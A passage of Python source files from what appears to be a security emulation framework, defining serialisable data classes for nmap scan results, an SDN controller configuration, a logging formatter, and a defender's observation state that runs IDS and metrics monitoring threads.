        :param ipaddr: the ip address of the hop
        :param rtt: the RTT of the hop
        :param host: the host of the hop
        """
        self.ttl = ttl
        self.ipaddr = ipaddr
        self.rtt = rtt
        self.host = host

    @staticmethod
    def from_dict(d: Dict[str, Any]) -> "NmapHop":
        """
        Converts a dict representation into an instance

        :param d: the dict to convert
        :return: the created instance
        """
        obj = NmapHop(ttl=d["ttl"], ipaddr=d["ipaddr"], rtt=d["rtt"], host=d["host"])
        return obj

    def to_dict(self) -> Dict[str, Any]:
        """
        Converts the object to a dict representation

        :return: a dict representation of the object
        """
        d: Dict[str, Any] = {}
        d["ttl"] = self.ttl
        d["ipaddr"] = self.ipaddr
        d["rtt"] = self.rtt
        d["host"] = self.host
        return d

    def __str__(self) -> str:
        """
        :return: a string representation of the object
        """
        return "ttl:{}, ipaddr:{}, rtt:{}, host:{}".format(self.ttl, self.ipaddr, self.rtt, self.host)

    @staticmethod
    def from_json_file(json_file_path: str) -> "NmapHop":
        """
        Reads a json file and converts it to a DTO

        :param json_file_path: the json file path
        :return: the converted DTO
        """
        import io
        import json
        with io.open(json_file_path, 'r') as f:
            json_str = f.read()
        return NmapHop.from_dict(json.loads(json_str))

    @staticmethod
    def schema() -> "NmapHop":
        """
        :return: get the schema of the DTO
        """
        return NmapHop(ttl=1, ipaddr="", rtt=0.5, host="")



import logging


class CustomFormatter(logging.Formatter):
    """
    Custom formatter for DEBUG-logging.

    Custom Formatter does these 2 things:
    1. Overrides 'funcName' with the value of 'func_name_override', if it exists.
    2. Overrides 'filename' with the value of 'file_name_override', if it exists.
    """
    def format(self, record) -> str:
        """
        Formats a given record

        :param record: the record to format
        :return: the formatted string
        """
        if hasattr(record, 'func_name_override'):
            record.funcName = record.func_name_override
        if hasattr(record, 'file_name_override'):
            record.filename = record.file_name_override
        return super(CustomFormatter, self).format(record)



from typing import Dict, Any, List
from csle_common.dao.emulation_config.node_container_config import NodeContainerConfig
from csle_common.dao.emulation_config.node_resources_config import NodeResourcesConfig
from csle_common.dao.emulation_config.node_firewall_config import NodeFirewallConfig
from csle_common.dao.emulation_config.sdn_controller_type import SDNControllerType
from csle_base.json_serializable import JSONSerializable


class SDNControllerConfig(JSONSerializable):
    """
    DTO containing configuration for the SDN controller
    """

    def __init__(self, container: NodeContainerConfig, resources: NodeResourcesConfig,
                 firewall_config: NodeFirewallConfig,
                 controller_port: int,
                 controller_type: SDNControllerType, controller_module_name: str, controller_web_api_port: int,
                 manager_log_file: str, manager_log_dir: str, manager_max_workers: int,
                 time_step_len_seconds: int = 15, version: str = "0.0.1",
                 manager_port: int = 50042):
        """
        Initializes the DTO

        :param container: the container config of the controller
        :param resources: the resources config of the controller
        :param firewall_config: the firewall config of the controller
        :param controller_port: the port of the controller
        :param controller_type: the type of the controller
        :param time_step_len_seconds: the length of a time-step in the emulation (for monitoring)
        :param controller_module_name: the name of the controller Python module
        :param controller_web_api_port: the port to run the controller's web API
        :param manager_log_dir: the directory to save log files of the manager
        :param manager_log_file: the file name for the manager logs
        :param manager_max_workers: the maximum number of gRPC workers of the manager
        :param manager_port: the port of the manager
        :param version: the version
        """
        self.container = container
        self.resources = resources
        self.firewall_config = firewall_config
        self.controller_port = controller_port
        self.time_step_len_seconds = time_step_len_seconds
        self.version = version
        self.controller_type = controller_type
        self.controller_module_name = controller_module_name
        self.controller_web_api_port = controller_web_api_port
        self.manager_log_file = manager_log_file
        self.manager_log_dir = manager_log_dir
        self.manager_max_workers = manager_max_workers
        self.manager_port = manager_port

    @staticmethod
    def from_dict(d: Dict[str, Any]) -> "SDNControllerConfig":
        """
        Converts a dict representation to an instance

        :param d: the dict to convert
        :return: the created instance
        """
        obj = SDNControllerConfig(
            container=NodeContainerConfig.from_dict(d["container"]),
            resources=NodeResourcesConfig.from_dict(d["resources"]),
            time_step_len_seconds=d["time_step_len_seconds"],
            version=d["version"], controller_type=d["controller_type"], controller_port=d["controller_port"],
            controller_web_api_port=d["controller_web_api_port"], controller_module_name=d["controller_module_name"],
            firewall_config=NodeFirewallConfig.from_dict(d["firewall_config"]), manager_port=d["manager_port"],
            manager_log_dir=d["manager_log_dir"], manager_log_file=d["manager_log_file"],
            manager_max_workers=d["manager_max_workers"])
        return obj

    def to_dict(self) -> Dict[str, Any]:
        """
        Converts the object to a dict representation

        :return: a dict representation of the object
        """
        d: Dict[str, Any] = {}
        d["container"] = self.container.to_dict()
        d["resources"] = self.resources.to_dict()
        d["time_step_len_seconds"] = self.time_step_len_seconds
        d["controller_type"] = self.controller_type
        d["controller_port"] = self.controller_port
        d["version"] = self.version
        d["controller_module_name"] = self.controller_module_name
        d["controller_web_api_port"] = self.controller_web_api_port
        d["firewall_config"] = self.firewall_config.to_dict()
        d["manager_port"] = self.manager_port
        d["manager_log_file"] = self.manager_log_file
        d["manager_log_dir"] = self.manager_log_dir
        d["manager_max_workers"] = self.manager_max_workers
        return d

    def __str__(self) -> str:
        """
        :return: a string representation of the object
        """
        return f"container: {self.container}, " \
               f"resources: {self.resources}, time step len: {self.time_step_len_seconds}, " \
               f"controller type: {self.controller_type}, controller_port: {self.controller_port}, " \
               f"version: {self.version}, controller_module_name: {self.controller_module_name}, " \
               f"controller_web_api_port: {self.controller_web_api_port}, firewall_config: {self.firewall_config}," \
               f"manager_port: {self.manager_port}, manager_log_file: {self.manager_log_file}, " \
               f"manager_log_dir: {self.manager_log_dir}, manager_max_workers: {self.manager_max_workers}"

    @staticmethod
    def from_json_file(json_file_path: str) -> "SDNControllerConfig":
        """
        Reads a json file and converts it to a DTO

        :param json_file_path: the json file path
        :return: the converted DTO
        """
        import io
        import json
        with io.open(json_file_path, 'r') as f:
            json_str = f.read()
        return SDNControllerConfig.from_dict(json.loads(json_str))

    def copy(self) -> "SDNControllerConfig":
        """
        :return: a copy of the DTO
        """
        return SDNControllerConfig.from_dict(self.to_dict())

    def create_execution_config(self, ip_first_octet: int, physical_servers: List[str]) -> "SDNControllerConfig":
        """
        Creates a new config for an execution

        :param ip_first_octet: the first octet of the IP of the new execution
        :param physical_servers: the physical servers of the execution
        :return: the new config
        """
        config = self.copy()
        if config is None:
            raise ValueError("Obtained None and not SDNControllerConfig")
        config.container = config.container.create_execution_config(ip_first_octet=ip_first_octet,
                                                                    physical_servers=physical_servers)
        config.resources = config.resources.create_execution_config(ip_first_octet=ip_first_octet)
        config.firewall_config = config.firewall_config.create_execution_config(ip_first_octet=ip_first_octet)
        return config



from typing import Optional, List, Dict, Any
from csle_common.dao.emulation_observation.common.emulation_port_observation_state \
    import EmulationPortObservationState
from csle_common.dao.emulation_observation.common.emulation_connection_observation_state \
    import EmulationConnectionObservationState
from csle_common.dao.emulation_config.node_container_config import NodeContainerConfig
from csle_common.consumer_threads.host_metrics_consumer_thread import HostMetricsConsumerThread
from csle_common.consumer_threads.docker_host_stats_consumer_thread import DockerHostStatsConsumerThread
from csle_common.consumer_threads.snort_ids_log_consumer_thread import SnortIdsLogConsumerThread
from csle_common.consumer_threads.ossec_ids_log_consumer_thread import OSSECIdsLogConsumerThread
from csle_common.dao.emulation_config.kafka_config import KafkaConfig
from csle_collector.host_manager.dao.host_metrics import HostMetrics
from csle_collector.docker_stats_manager.dao.docker_stats import DockerStats
from csle_collector.snort_ids_manager.dao.snort_ids_ip_alert_counters import SnortIdsIPAlertCounters
from csle_collector.ossec_ids_manager.dao.ossec_ids_alert_counters import OSSECIdsAlertCounters
from csle_base.json_serializable import JSONSerializable


class EmulationDefenderMachineObservationState(JSONSerializable):
    """
    Represents the defender's belief state of a component in the emulation
    """

    def __init__(self, ips: List[str], kafka_config: Optional[KafkaConfig], host_metrics: HostMetrics,
                 docker_stats: DockerStats, snort_ids_ip_alert_counters: SnortIdsIPAlertCounters,
                 ossec_ids_alert_counters: OSSECIdsAlertCounters):
        """
        Initializes the DTO

        :param ips: the ip of the machine
        :param kafka_config: the kafka config
        :param host_metrics: the host metrics object
        :param docker_stats: the docker stats object
        :param snort_ids_ip_alert_counters: the snort ids ip alert counter object
        :param ossec_ids_alert_counters: the ossec ids alert counter object
        """
        self.ips = ips
        self.os = "unknown"
        self.ports: List[EmulationPortObservationState] = []
        self.ssh_connections: List[EmulationConnectionObservationState] = []
        self.kafka_config = kafka_config
        self.host_metrics = host_metrics
        self.docker_stats = docker_stats
        self.snort_ids_ip_alert_counters = snort_ids_ip_alert_counters
        self.ossec_ids_alert_counters = ossec_ids_alert_counters
        self.host_metrics_consumer_thread: Optional[HostMetricsConsumerThread] = None
        self.docker_stats_consumer_thread: Optional[DockerHostStatsConsumerThread] = None
        self.snort_ids_log_consumer_thread: Optional[SnortIdsLogConsumerThread] = None
        self.ossec_ids_log_consumer_thread: Optional[OSSECIdsLogConsumerThread] = None

    def start_monitor_threads(self) -> None:
        """
        Starts the monitoring threads

        :return: None
        """
        if self.kafka_config is None:
            raise ValueError("Cannot start monitoring threads since the kafka config is None.")
        self.host_metrics_consumer_thread = HostMetricsConsumerThread(
            host_ip=self.ips[0], kafka_server_ip=self.kafka_config.container.docker_gw_bridge_ip,
            kafka_port=self.kafka_config.kafka_port_external, host_metrics=self.host_metrics)
        self.docker_stats_consumer_thread = DockerHostStatsConsumerThread(
            host_ip=self.ips[0], kafka_server_ip=self.kafka_config.container.docker_gw_bridge_ip,
            kafka_port=self.kafka_config.kafka_port_external, docker_stats=self.docker_stats)
        self.snort_ids_log_consumer_thread = SnortIdsLogConsumerThread(
            host_ip=self.ips[0], kafka_server_ip=self.kafka_config.container.docker_gw_bridge_ip,
            kafka_port=self.kafka_config.kafka_port_external, snort_ids_alert_counters=self.snort_ids_ip_alert_counters)
        self.ossec_ids_log_consumer_thread = OSSECIdsLogConsumerThread(
            host_ip=self.ips[0], kafka_server_ip=self.kafka_config.container.docker_gw_bridge_ip,
            kafka_port=self.kafka_config.kafka_port_external, ossec_ids_alert_counters=self.ossec_ids_alert_counters)
        self.host_metrics_consumer_thread.start()
        self.docker_stats_consumer_thread.start()
        self.snort_ids_log_consumer_thread.start()
        self.ossec_ids_log_consumer_thread.start()

    @staticmethod
    def from_container(container: NodeContainerConfig, kafka_config: KafkaConfig):
        """
        Creates an instance from a container configuration

        :param container: the container to create the instance from
        :param kafka_config: the kafka config
        :return: the created instance
        """
        obj = EmulationDefenderMachineObservationState(ips=container.get_ips(), kafka_config=kafka_config,
                                                       host_metrics=HostMetrics(), docker_stats=DockerStats(),
                                                       ossec_ids_alert_counters=OSSECIdsAlertCounters(),
                                                       snort_ids_ip_alert_counters=SnortIdsIPAlertCounters())
        obj.os = container.os
        return obj

    @staticmethod
    def from_dict(d: Dict[str, Any]) -> "EmulationDefenderMachineObservationState":
        """
        Converts a dict representation of the object to an instance

        :param d: the dict representation
        :return: the object instance
        """
        if "kafka_config" in d and d["kafka_config"] is not None:
            kafka_config = KafkaConfig.from_dict(d["kafka_config"])
        else:
            kafka_config = None
        if "snort_ids_ip_alert_counters" in d and d["snort_ids_ip_alert_counters"] is not None:
            ip_alert_counters = SnortIdsIPAlertCounters.from_dict(d["snort_ids_ip_alert_counters"])
        else:
            ip_alert_counters = SnortIdsIPAlertCounters()
        if "ossec_ids_alert_counters" in d and d["ossec_ids_alert_counters"] is not None:
            ossec_alert_counters = OSSECIdsAlertCounters.from_dict(d["ossec_ids_alert_counters"])
        else:
            ossec_alert_counters = OSSECIdsAlertCounters()
        obj = EmulationDefenderMachineObservationState(
            ips=d["ips"], kafka_config=kafka_config,
            host_metrics=HostMetrics.from_dict(d["host_metrics"]),
            docker_stats=DockerStats.from_dict(d["docker_stats"]),
            snort_ids_ip_alert_counters=ip_alert_counters, ossec_ids_alert_counters=ossec_alert_counters)
        obj.os = d["os"]
        obj.ports = list(map(lambda x: EmulationPortObservationState.from_dict(x), d["ports"]))
        obj.ssh_connections = list(map(lambda x: EmulationConnectionObservationState.from_dict(x),
                                       d["ssh_connections"]))
        return obj

    def to_dict(self) -> Dict[str, Any]:
        """
        Converts the object to a dict representation
        
        :return: a dict representation of the object
        """
        d: Dict[str, Any] = {}
        d["ips"] = self.ips
        d["os"] = self.os
        d["ports"] = list(map(lambda x: x.to_dict(), self.ports))
        d["ssh_connections"] = list(map(lambda x: x.to_dict(), self.ssh_connections))
        d["host_metrics"] = self.host_metrics.to_dict() if self.host_metrics is not None else None
        d["docker_stats"] = self.docker_stats.to_dict() if self.docker_stats is not None else None
        d["ossec_ids_alert_counters"] = self.ossec_ids_alert_counters.to_dict() \
            if self.ossec_ids_alert_counters is not None else None
        d["snort_ids_ip_alert_counters"] = self.snort_ids_ip_alert_counters.to_dict() \
            if self.snort_ids_ip_alert_counters is not None else None
        d["kafka_config"] = self.kafka_config.to_dict() if self.kafka_config is not None else None
        return d

    def __str__(self) -> str:
        """
        :return: a string representation of the object
        """
        return f"ips:{self.ips}, os:{self.os}, ports: {list(map(lambda x: str(x), self.ports))}, " \
               f"ssh_connections: {list(map(lambda x: str(x), self.ssh_connections))}, " \
               f"host_metrics: {self.host_metrics}, docker_stats: {self.docker_stats}, " \
               f"snort_ids_ip_alert_counters: {self.snort_ids_ip_alert_counters}, " \
               f"ossec_ids_alert_counters: {self.ossec_ids_alert_counters}"

    def sort_ports(self) -> None:
        """
        Sorts the list of ports

        :return: None
        """
        for p in self.ports:
            p.port = int(p.port)
        self.ports = sorted(self.ports, key=lambda x: x.kafka_port, reverse=False)

    def cleanup(self) -> None:
        """
        Cleans up environment state. This method is particularly useful in emulation mode where there are
        SSH/Telnet/FTP... connections that should be cleaned up, as well as background threads.

        :return: None
        """
        if self.docker_stats_consumer_thread is not None:
            self.docker_stats_consumer_thread.running = False
            self.docker_stats_consumer_thread.consumer.close()
        if self.host_metrics_consumer_thread is not None:
            self.host_metrics_consumer_thread.running = False
            self.host_metrics_consumer_thread.consumer.close()
        if self.snort_ids_log_consumer_thread is not None:
            self.snort_ids_log_consumer_thread.running = False
            self.snort_ids_log_consumer_thread.consumer.close()
        if self.ossec_ids_log_consumer_thread is not None:
            self.ossec_ids_log_consumer_thread.running = False
            self.ossec_ids_log_consumer_thread.consumer.close()
        for c in self.ssh_connections:
            c.cleanup()

    def copy(self) -> "EmulationDefenderMachineObservationState":
        """
        :return: a copy of the object
        """
        m_copy = EmulationDefenderMachineObservationState(
            ips=self.ips, kafka_config=self.kafka_config,
            host_metrics=self.host_metrics.copy(),
            docker_stats=self.docker_stats.copy(),
            ossec_ids_alert_counters=self.ossec_ids_alert_counters.copy(),
            snort_ids_ip_alert_counters=self.snort_ids_ip_alert_counters.copy())
        m_copy.os = self.os
        if self.ports == []:
            m_copy.ports = self.ports
        else:
            m_copy.ports = list(map(lambda x: x.copy(), self.ports))
        if self.ssh_connections == []:
            m_copy.ssh_connections = self.ssh_connections
        else:
            m_copy.ssh_connections = list(map(lambda x: x.copy(), self.ssh_connections))
        if self.snort_ids_ip_alert_counters is None:
            m_copy.snort_ids_ip_alert_counters = self.snort_ids_ip_alert_counters
        else:
            m_copy.snort_ids_ip_alert_counters = self.snort_ids_ip_alert_counters.copy()
        if self.ossec_ids_alert_counters is None:
            m_copy.ossec_ids_alert_counters = self.ossec_ids_alert_counters
        else:
            m_copy.ossec_ids_alert_counters = self.ossec_ids_alert_counters.copy()
        return m_copy

    @staticmethod
    def from_json_file(json_file_path: str) -> "EmulationDefenderMachineObservationState":
        """
        Reads a json file and converts it to a DTO

        :param json_file_path: the json file path
        :return: the converted DTO
        """
        import io
        import json
        with io.open(json_file_path, 'r') as f:
            json_str = f.read()
        return EmulationDefenderMachineObservationState.from_dict(json.loads(json_str))

    def num_attributes(self) -> int:
        """
        :return: The number of attribute of the DTO
        """
        num_attributes = 2
        if self.host_metrics is not None:
            num_attributes = num_attributes + self.host_metrics.num_attributes()
        if self.docker_stats is not None:
            num_attributes = num_attributes + self.docker_stats.num_attributes()
        if len(self.ports) > 0:
            num_attributes = num_attributes + len(self.ports) * self.ports[0].num_attributes()
        if len(self.ssh_connections) > 0:
            num_attributes = num_attributes + len(self.ports) * self.ssh_connections[0].num_attributes()
        return num_attributes

    @staticmethod
    def schema() -> "EmulationDefenderMachineObservationState":
        """
        :return: get the schema of the DTO
        """
        return EmulationDefenderMachineObservationState(ips=[""], kafka_config=KafkaConfig.schema(),
                                                        host_metrics=HostMetrics.schema(),
                                                        docker_stats=DockerStats.schema(),
                                                        snort_ids_ip_alert_counters=SnortIdsIPAlertCounters.schema(),
                                                        ossec_ids_alert_counters=OSSECIdsAlertCounters.schema())



from typing import Optional, List, Dict, Any
import copy
from csle_common.dao.emulation_action_result.nmap_host_status import NmapHostStatus
from csle_common.dao.emulation_action_result.nmap_port import NmapPort
from csle_common.dao.emulation_action_result.nmap_os import NmapOs
from csle_common.dao.emulation_action_result.nmap_vuln import NmapVuln
from csle_common.dao.emulation_action_result.nmap_brute_credentials import NmapBruteCredentials
from csle_common.dao.emulation_action_result.nmap_trace import NmapTrace
from csle_base.json_serializable import JSONSerializable


class NmapHostResult(JSONSerializable):
    """
    A DTO representing a host found with an NMAP scan
    """

    def __init__(self, status: NmapHostStatus = NmapHostStatus.DOWN, ips: Optional[List[str]] = None,
                 mac_addr: Optional[str] = None, hostnames: Optional[List[str]] = None,
                 ports: Optional[List[NmapPort]] = None, os: Optional[NmapOs] = None,
                 os_matches: Optional[List[NmapOs]] = None,
                 vulnerabilities: Optional[List[NmapVuln]] = None,
                 credentials: Optional[List[NmapBruteCredentials]] = None,
                 trace: Optional[NmapTrace] = None):
        """
        Initializes the DTO

        :param status: the status of the host
        :param ips: the ip address of the host
        :param mac_addr: the mac address of the host
        :param hostnames: the hostnames of the host
        :param ports: the ports of the host
        :param os: the operating system of the host
        :param os_matches: the matched operating system of the host
        :param vulnerabilities: the vulnerabilities of the host
        :param credentials: the credentials of the host
        :param trace: the trace of the host
        """
        self.status = status
        self.ips = ips
        if self.ips is None:
            self.ips = []
        self.mac_addr = mac_addr
        self.hostnames = hostnames
        self.ports = ports
        self.os = os
        self.os_matches = os_matches
        self.vulnerabilities = vulnerabilities
        self.credentials = credentials
        self.trace = trace

    def __str__(self) -> str:
        """
        :return: a string representation of the object
        """
        if self.hostnames is None or self.ports is None or self.os_matches \
                is None or self.vulnerabilities is None or self.credentials is None:
            raise ValueError("One of the objects to join as return string is None")
        return f"status:{self.status}, ip_addr:{self.ips}, mac_addr:{self.mac_addr}, " \
               f"hostnames:{' '.join(self.hostnames)}, " \
               f"ports:{' '.join(list(map(lambda x: str(x), self.ports)))}, os:{self.os}, " \
               f"os_matches:{' '.join(list(map(lambda x: str(x), self.os_matches)))}, " \
               f"vulnerabilities:{' '.join(list(map(lambda x: str(x), self.vulnerabilities)))}, " \
               f"credentials:{' '.join(list(map(lambda x: str(x), self.credentials)))}, " \
               f"trace:{self.trace}"

    def copy(self) -> "NmapHostResult":
        """
        :return: a copy of the object
        """
        return copy.deepcopy(self)

    def ips_match(self, ips: List[str]) -> bool:
        """
        Checks if a list of ips overlap with the ips of this host

        :param ips: the list of ips to check
        :return:  True if they match, False otherwise
        """
        if self.ips is None:
            raise ValueError("No ips existing")
        for ip in self.ips:
            if ip in ips:
                return True
        return False

    def to_dict(self) -> Dict[str, Any]:
        """
        Converts the object to a dict representation

        :return: a dict representation of the object
        """
        if self.ports is None or self.os is None or self.os_matches is None or \
                self.vulnerabilities is None or self.credentials is None or self.trace is None:
            raise ValueError("At least one of the iterable objects is None")
        d: Dict[str, Any] = {}
        d["status"] = self.status
        d["ips"] = self.ips
        d["mac_addr"] = self.mac_addr
        d["hostnames"] = self.hostnames
        d["ports"] = list(map(lambda x: x.to_dict(), self.ports))
        d["os"] = self.os.to_dict()
        d["os_matches"] = list(map(lambda x: x.to_dict(), self.os_matches))
        d["vulnerabilities"] = list(map(lambda x: x.to_dict(), self.vulnerabilities))
        d["credentials"] = list(map(lambda x: x.to_dict(), self.credentials))
        d["trace"] = self.trace.to_dict()
        return d

    @staticmethod
    def from_dict(d: Dict[str, Any]) -> "NmapHostResult":
        """
        Converts a dict representation to an instance

        :param d: the dict to convert
        :return: the created instance
        """
        obj = NmapHostResult(
            status=d["status"], ips=d["ips"], mac_addr=d["mac_addr"], hostnames=d["hostnames"],
            ports=list(map(lambda x: NmapPort.from_dict(x), d["ports"])),
            os=NmapOs.from_dict(d["os"]),
            os_matches=list(map(lambda x: NmapOs.from_dict(x), d["os_matches"])),
            vulnerabilities=list(map(lambda x: NmapVuln.from_dict(x), d["vulnerabilities"])),
            credentials=list(map(lambda x: NmapBruteCredentials.from_dict(x), d["credentials"])),
            trace=NmapTrace.from_dict(d["trace"])
        )
        return obj

    @staticmethod
    def from_json_file(json_file_path: str) -> "NmapHostResult":
        """
        Reads a json file and converts it to a DTO

        :param json_file_path: the json file path
        :return: the converted DTO
        """
        import io
        import json
        with io.open(json_file_path, 'r') as f:
            json_str = f.read()
        return NmapHostResult.from_dict(json.loads(json_str))
